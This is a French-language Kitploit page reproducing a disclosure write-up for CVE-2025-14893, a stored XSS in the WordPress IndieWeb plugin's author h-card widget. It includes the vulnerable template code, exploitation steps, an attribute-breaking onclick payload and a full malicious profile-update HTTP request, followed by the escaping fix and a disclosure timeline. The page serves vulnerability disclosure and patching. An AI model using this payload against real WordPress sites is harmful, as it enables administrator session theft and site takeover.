Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-14893 — Cross-Site Scripting (XSS) stocké authentifié dans le plugin WordPress IndieWeb | Kitploit
Outils/GitHubGitHub/d3kc4rt1/cve-2025-14893
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionArticles et RechercheApprentissage et Éducation
GitHubd3kc4rt1/cve-2025-14893

CVE-2025-14893

Cross-Site Scripting (XSS) stocké authentifié dans le plugin WordPress IndieWeb

Voir le dépôt
il y a 4 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-14893 : Cross-Site Scripting (XSS) stocké authentifié dans le plugin WordPress IndieWeb

Avertissement : Ce dépôt est créé à des fins éducatives et de divulgation éthique uniquement. La vulnérabilité a été signalée de manière responsable à l'éditeur et a été corrigée. N'utilisez pas ces informations pour exploiter des systèmes sans autorisation appropriée.

Résumé exécutif

Une vulnérabilité de Cross-Site Scripting (XSS) stocké a été découverte dans le plugin IndieWeb pour WordPress (versions <= 4.0.5). Cette vulnérabilité permet à des attaquants authentifiés disposant de privilèges Auteur ou supérieurs d'injecter du JavaScript malveillant dans le champ « Téléphone » de leur profil utilisateur.

Lorsque le « Widget H-Card du profil auteur » est affiché en frontal, le script injecté est rendu sans échappement approprié. Si un utilisateur hautement privilégié, tel qu'un administrateur, clique sur le lien manipulé, le script s'exécute dans le contexte de son navigateur. Cela peut conduire à un détournement de session, à des actions administratives non autorisées et à une prise de contrôle totale du compte (ATO).

Présentation de la vulnérabilité

  • Identifiant CVE : CVE-2025-14893
  • Produit : IndieWeb (extension WordPress)
  • Versions concernées : <= 4.0.5
  • Type de vulnérabilité : Cross-Site Scripting (XSS) stocké (CWE-79)
  • Privilèges requis : Authentifié (niveau Auteur et supérieur)

Analyse technique approfondie et cause racine

Le problème principal réside dans la gestion non sécurisée des métadonnées utilisateur au sein du système de gabarits de l'extension, plus précisément dans l'absence d'utilisation des fonctions d'échappement intégrées de WordPress.

Fichier vulnérable : templates/h-card.php (ligne 27)

root@kitploit:~
<a class="p-tel tel" href="tel:<?php echo $user->get( 'tel' ); ?>"><?php echo $user->get( 'tel' ); ?></a>

La faille : L'extension affiche directement les métadonnées tel de l'utilisateur à l'intérieur de l'attribut HTML href en utilisant echo sans les encapsuler dans esc_attr(). Cela permet à un attaquant de fournir une chaîne conçue incluant un guillemet double (") pour fermer prématurément l'attribut href, suivi d'attributs HTML arbitraires (tels que style ou onclick).

Impact commercial

  • Prise de contrôle du compte (ATO) : Si un administrateur interagit avec l'élément manipulé, le JavaScript de l'attaquant peut voler les cookies de session ou exécuter des requêtes AJAX administratives, donnant ainsi à l'attaquant un contrôle total sur le site WordPress.
  • Atteinte à la réputation : L'attaquant peut modifier les éléments visibles de la page (défiguration) ou rediriger les visiteurs légitimes vers des sites tiers malveillants.

Preuve de concept (PoC)

Prérequis

  1. WordPress installé avec IndieWeb <= 4.0.5 activé.
  2. Un compte attaquant avec le rôle Auteur.
  3. Le « Widget H-Card du profil auteur » ajouté dans une zone visible du frontal (par exemple, la barre latérale).

Étapes d'exploitation

  1. Connectez-vous au tableau de bord WordPress en tant qu'Auteur.
  2. Accédez à Profil (/wp-admin/profile.php).
  3. Faites défiler jusqu'au champ Téléphone.
  4. Injectez la charge utile suivante (qui sort de l'attribut href) :
    root@kitploit:~
    Click_Me" style="background:#ff4444; color:white; padding:5px; display:inline-block;" onclick="alert(document.cookie);
    
  5. Cliquez sur Mettre à jour le profil.
  6. Étape cruciale : Créez et publiez un nouvel article. Le widget vulnérable ne s'affiche que sur les pages d'articles individuels (is_single()) pour afficher les informations de l'auteur.
  7. Déclenchement : Lorsqu'un administrateur visite l'article publié en frontal et clique sur le bouton téléphonique « Click_Me » nouvellement stylisé, la charge utile XSS (alertant sur le cookie de session) s'exécute.

Exemple de requête HTTP malveillante (mise à jour du profil)

root@kitploit:~
POST /wp-admin/profile.php HTTP/1.1
Host: TARGET
Content-Type: application/x-www-form-urlencoded
Cookie: [Author_Session_Cookies]

_wpnonce=[valid_nonce]&_wp_http_referer=%2Fwp-admin%2Fprofile.php&from=profile&checkuser_id=2&color-nonce=[nonce]&admin_color=fresh&admin_bar_front=1&first_name=&last_name=&nickname=attacker&display_name=attacker&email=attacker%40example.com&tel=Click_Me"%20style%3D"background%3A%23ff4444%3B%20color%3Awhite%3B%20padding%3A5px%3B%20display%3Ainline-block%3B"%20onclick%3D"alert(document.cookie)%3B&action=update&user_id=2&submit=Update+Profile

Correction

Pour corriger cette vulnérabilité, les développeurs de l'extension doivent échapper correctement la sortie à l'aide des fonctions esc_attr() et esc_html() de WordPress.

Exemple de code corrigé :

root@kitploit:~
<a class="p-tel tel" href="tel:<?php echo esc_attr( $user->get( 'tel' ) ); ?>"><?php echo esc_html( $user->get( 'tel' ) ); ?></a>

Chronologie

  • Date (2026-03-03) : Signalement à Wordfence.
  • Date (2026-03-20) : Vulnérabilité corrigée / Divulgation publique.

Références et crédits

  • Base de données des vulnérabilités Wordfence
  • CVE-2025-14893 sur NVD
  • Extension IndieWeb sur WordPress.org
Télécharger l’outil